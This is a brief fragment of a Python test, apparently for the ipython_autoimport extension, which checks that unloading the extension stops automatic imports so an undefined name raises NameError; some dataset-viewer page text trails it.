        ip.run_cell("%unload_ext ipython_autoimport")
        ip.run_cell("try: a\nexcept NameError: print('ok')")
    assert captured.stdout == "ok\n"
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.